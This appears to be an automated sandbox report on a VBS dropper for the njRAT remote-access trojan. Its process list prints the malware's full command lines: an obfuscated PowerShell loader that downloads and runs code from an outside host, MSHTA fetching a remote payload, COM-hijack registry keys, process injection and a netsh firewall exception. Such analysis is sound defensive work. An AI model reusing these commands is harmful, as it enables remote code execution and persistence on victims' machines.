Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 18:59
Static task
static1
Behavioral task
behavioral1
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win10v2004-20220721-en
General
-
Target
LIYDOERWQPOKERHAVAXOCI.vbs
-
Size
1KB
-
MD5
7fa6c86604b4b5706beac109127af386
-
SHA1
aeac233400b02928f3a025a740bcfd6e2f85cd8a
-
SHA256
04d8d89df7a3ebe9d24b4635b6f4760e81465d672cb9f010e020b336b2d811ec
-
SHA512
e79fe1be4f96e06da8f60e7bb486e854bbf66509c637f08734771cc6a26a8051a281f8e484145252cd2e90d7196175761ad14f4cf00122ae9431a330ba189330
Malware Config
Extracted
https://tradeguru.com.pk/enc.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEPOWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2672 4200 MSHTA.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 972 4200 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1232 4200 POWERSHELL.exe -
Blocklisted process makes network request 3 IoCs
Processes:
MSHTA.EXEPOWERSHELL.exeflow pid process 12 2672 MSHTA.EXE 15 2672 MSHTA.EXE 20 972 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4956 set thread context of 3684 4956 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 972 POWERSHELL.exe 972 POWERSHELL.exe 3500 powershell.exe 3500 powershell.exe 1232 POWERSHELL.exe 1232 POWERSHELL.exe 4956 powershell.exe 4956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 972 POWERSHELL.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 1232 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 3500 powershell.exe Token: SeSecurityPrivilege 3500 powershell.exe Token: SeTakeOwnershipPrivilege 3500 powershell.exe Token: SeLoadDriverPrivilege 3500 powershell.exe Token: SeSystemProfilePrivilege 3500 powershell.exe Token: SeSystemtimePrivilege 3500 powershell.exe Token: SeProfSingleProcessPrivilege 3500 powershell.exe Token: SeIncBasePriorityPrivilege 3500 powershell.exe Token: SeCreatePagefilePrivilege 3500 powershell.exe Token: SeBackupPrivilege 3500 powershell.exe Token: SeRestorePrivilege 3500 powershell.exe Token: SeShutdownPrivilege 3500 powershell.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeSystemEnvironmentPrivilege 3500 powershell.exe Token: SeRemoteShutdownPrivilege 3500 powershell.exe Token: SeUndockPrivilege 3500 powershell.exe Token: SeManageVolumePrivilege 3500 powershell.exe Token: 33 3500 powershell.exe Token: 34 3500 powershell.exe Token: 35 3500 powershell.exe Token: 36 3500 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeIncreaseQuotaPrivilege 3500 powershell.exe Token: SeSecurityPrivilege 3500 powershell.exe Token: SeTakeOwnershipPrivilege 3500 powershell.exe Token: SeLoadDriverPrivilege 3500 powershell.exe Token: SeSystemProfilePrivilege 3500 powershell.exe Token: SeSystemtimePrivilege 3500 powershell.exe Token: SeProfSingleProcessPrivilege 3500 powershell.exe Token: SeIncBasePriorityPrivilege 3500 powershell.exe Token: SeCreatePagefilePrivilege 3500 powershell.exe Token: SeBackupPrivilege 3500 powershell.exe Token: SeRestorePrivilege 3500 powershell.exe Token: SeShutdownPrivilege 3500 powershell.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeSystemEnvironmentPrivilege 3500 powershell.exe Token: SeRemoteShutdownPrivilege 3500 powershell.exe Token: SeUndockPrivilege 3500 powershell.exe Token: SeManageVolumePrivilege 3500 powershell.exe Token: 33 3500 powershell.exe Token: 34 3500 powershell.exe Token: 35 3500 powershell.exe Token: 36 3500 powershell.exe Token: SeIncreaseQuotaPrivilege 3500 powershell.exe Token: SeSecurityPrivilege 3500 powershell.exe Token: SeTakeOwnershipPrivilege 3500 powershell.exe Token: SeLoadDriverPrivilege 3500 powershell.exe Token: SeSystemProfilePrivilege 3500 powershell.exe Token: SeSystemtimePrivilege 3500 powershell.exe Token: SeProfSingleProcessPrivilege 3500 powershell.exe Token: SeIncBasePriorityPrivilege 3500 powershell.exe Token: SeCreatePagefilePrivilege 3500 powershell.exe Token: SeBackupPrivilege 3500 powershell.exe Token: SeRestorePrivilege 3500 powershell.exe Token: SeShutdownPrivilege 3500 powershell.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeSystemEnvironmentPrivilege 3500 powershell.exe Token: SeRemoteShutdownPrivilege 3500 powershell.exe Token: SeUndockPrivilege 3500 powershell.exe Token: SeManageVolumePrivilege 3500 powershell.exe Token: 33 3500 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 972 wrote to memory of 3500 972 POWERSHELL.exe powershell.exe PID 972 wrote to memory of 3500 972 POWERSHELL.exe powershell.exe PID 3500 wrote to memory of 5080 3500 powershell.exe WScript.exe PID 3500 wrote to memory of 5080 3500 powershell.exe WScript.exe PID 1232 wrote to memory of 4860 1232 POWERSHELL.exe cmd.exe PID 1232 wrote to memory of 4860 1232 POWERSHELL.exe cmd.exe PID 4860 wrote to memory of 4180 4860 cmd.exe reg.exe PID 4860 wrote to memory of 4180 4860 cmd.exe reg.exe PID 4860 wrote to memory of 4236 4860 cmd.exe reg.exe PID 4860 wrote to memory of 4236 4860 cmd.exe reg.exe PID 4860 wrote to memory of 4424 4860 cmd.exe cmd.exe PID 4860 wrote to memory of 4424 4860 cmd.exe cmd.exe PID 4424 wrote to memory of 4956 4424 cmd.exe powershell.exe PID 4424 wrote to memory of 4956 4424 cmd.exe powershell.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 4956 wrote to memory of 3684 4956 powershell.exe aspnet_compiler.exe PID 3684 wrote to memory of 1320 3684 aspnet_compiler.exe netsh.exe PID 3684 wrote to memory of 1320 3684 aspnet_compiler.exe netsh.exe PID 3684 wrote to memory of 1320 3684 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<[email protected]@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.batFilesize
706B
MD51a7a326391b638c03d76369946fc0052
SHA17ae0ffd77ec76b94d735265efad35ddd072cdf36
SHA2560223739ebea16b1f70bf88f3eb43afd01c315c1e7142a72bf8931bb6be9ea09f
SHA512449ce3c15d2d36e42c00c9f9b1df759aa830de931532ee17d16ff6b50a8fe3d180ae474e2e8aca66e9af47df434293f3d96367dedaa91ad1ce60383fe23f9495
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1Filesize
3KB
MD589879c7e1b80b9171b57ec7290c50cf8
SHA14d2761deb7c46b99f5c8ebc4329f0ccd5b3aace3
SHA256dc8f58abd89fed28b00f23da6657188e40dde2da65c254c12a38c4ed1984c6b2
SHA512d8f579f01ddba32beb1cc578fd798b6e8790073261fdd71c4b5b0a277766a68833ca5834b006e9e9c3582f2476fa77b8019e98f744dafdf56f9e0239afe1dd3b
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbsFilesize
1KB
MD577d9ab54d90a588d38b4a402d7cf25bb
SHA1f72cf4ad3106815b8f3dc9ab804ae285b6bad1e6
SHA25625f09c56e34e4a61e8e57e453c2a3ed05ff33b6e10f1d78af94301ddf312a9f4
SHA512c2054a0e6df593a318fd310b82ed43cb8cf8f89b58bd784acd3ec5ca2a7b039f7fc2848a7641cc43215c0656ea71d3a09ed800d0164c293e5b54bbd27ffe21e6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c14cfe9cceee0b2fa2f4d0638215f4b7
SHA15895dd3fcff705cd16caba80ecc28edb67591fe0
SHA2569a6678bda60018ea04abbd3a5569f2349a4e9a1d533d150e030197330a5ec02b
SHA512c9b31f7914e4ee36306aed9625188c45e820e94ccd542a63a0ce73f19989eaa699e407a74db0c66fe7b6492b9564cd7d0c078ff044be20ea5f700a864577428c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f87b0558f50792e4684d92fb3d271c24
SHA1e745842dfeec7403c04a660ad6a2f2231ba605bb
SHA25661d84320415c97ff5d41de5030ba8b8b77c04295d2137f95de9e947a954a8192
SHA51256275978bc50ff36bd9ace519adc25d204955983ba0394ced54f9a70d063c4445e591df6e697b536a1abce8cd4795b80e572f17ae31063c97926cff4553d51a2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
memory/972-132-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/972-133-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/972-151-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/972-131-0x000001E1A0A10000-0x000001E1A0A32000-memory.dmpFilesize
136KB
-
memory/1232-144-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/1232-157-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/1320-161-0x0000000000000000-mapping.dmp
-
memory/3500-135-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/3500-147-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/3500-134-0x0000000000000000-mapping.dmp
-
memory/3684-162-0x0000000005BA0000-0x0000000005C06000-memory.dmpFilesize
408KB
-
memory/3684-159-0x0000000005580000-0x0000000005B24000-memory.dmpFilesize
5.6MB
-
memory/3684-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3684-153-0x000000000040BBBE-mapping.dmp
-
memory/3684-160-0x0000000005090000-0x0000000005122000-memory.dmpFilesize
584KB
-
memory/3684-163-0x0000000005B30000-0x0000000005B3A000-memory.dmpFilesize
40KB
-
memory/3684-158-0x0000000004F30000-0x0000000004FCC000-memory.dmpFilesize
624KB
-
memory/4180-141-0x0000000000000000-mapping.dmp
-
memory/4236-142-0x0000000000000000-mapping.dmp
-
memory/4424-143-0x0000000000000000-mapping.dmp
-
memory/4860-139-0x0000000000000000-mapping.dmp
-
memory/4956-155-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/4956-150-0x00007FFE177D0000-0x00007FFE18291000-memory.dmpFilesize
10.8MB
-
memory/4956-145-0x0000000000000000-mapping.dmp
-
memory/5080-137-0x0000000000000000-mapping.dmp